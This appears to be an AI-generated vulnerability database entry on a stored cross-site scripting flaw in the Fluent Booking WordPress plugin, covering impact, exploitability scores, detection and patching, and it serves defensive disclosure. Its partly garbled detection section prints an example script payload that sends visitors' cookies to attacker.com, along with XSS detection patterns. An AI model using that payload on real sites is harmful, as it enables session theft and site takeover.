
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2231 is a Stored Cross-Site Scripting (XSS) vulnerability in the Fluent Booking plugin for WordPress, affecting all versions up to and including 2.0.01. The flaw stems from insufficient input sanitization and output escaping across multiple parameters, allowing unauthenticated attackers to inject arbitrary web scripts that execute when any user visits an affected page. It was published on March 26, 2026, with Wordfence as the assigning authority. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (Wordfence, EUVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Insufficient sanitization exists in multiple locations within the plugin codebase, including LocationService.php (lines 110 and 115), Booking.php (lines 440 and 448), and FrontEndHandler.php (line 864). Because no authentication is required and no user interaction is needed to store the malicious payload, an attacker can submit crafted input through booking-related parameters that is then persistently stored and rendered unsanitized to subsequent visitors. A patch was committed to the WordPress plugin repository in changeset 3463540 (Wordfence, WordPress Trac).
Successful exploitation allows unauthenticated attackers to persistently inject malicious JavaScript into pages served to any site visitor or administrator. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of authenticated users (including administrators), and potential full site takeover if an admin session is compromised. The scope is marked as Changed, meaning the injected scripts can affect users and resources beyond the vulnerable plugin itself (Wordfence).
No public proof-of-concept exploit code has been identified at this time. The vulnerability requires no authentication and no user interaction to store the payload, making it trivially exploitable by any network-accessible attacker. The EPSS score is approximately 0.078% (0.000780), indicating a currently low probability of active exploitation in the wild. There is no indication of CISA KEV catalog inclusion or known threat actor attribution as of the latest available data (Feedly).
LocationService.php, Booking.php, and FrontEndHandler.php.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected into a vulnerable booking form field.%3Cscript%3E, <script>, onerror=, onload=) in parameter values.<script> tags or JavaScript event handlers stored in the wp_posts, wp_postmeta, or plugin-specific booking tables within the WordPress database.Users should update the Fluent Booking plugin to a version beyond 2.0.01, which includes the fix committed in WordPress plugin repository changeset 3463540. No configuration-based workaround is available that fully mitigates the risk; updating is the only reliable remediation. As an interim measure, site administrators can disable the Fluent Booking plugin until the update is applied, and deploy a Web Application Firewall (WAF) rule to filter XSS payloads in booking-related form submissions (Wordfence, WordPress Trac).
Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of March 23–29, 2026, noting the unauthenticated nature of the flaw as particularly concerning. No significant independent researcher commentary or broad media coverage has been identified beyond standard vulnerability aggregator reporting (Wordfence Blog).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."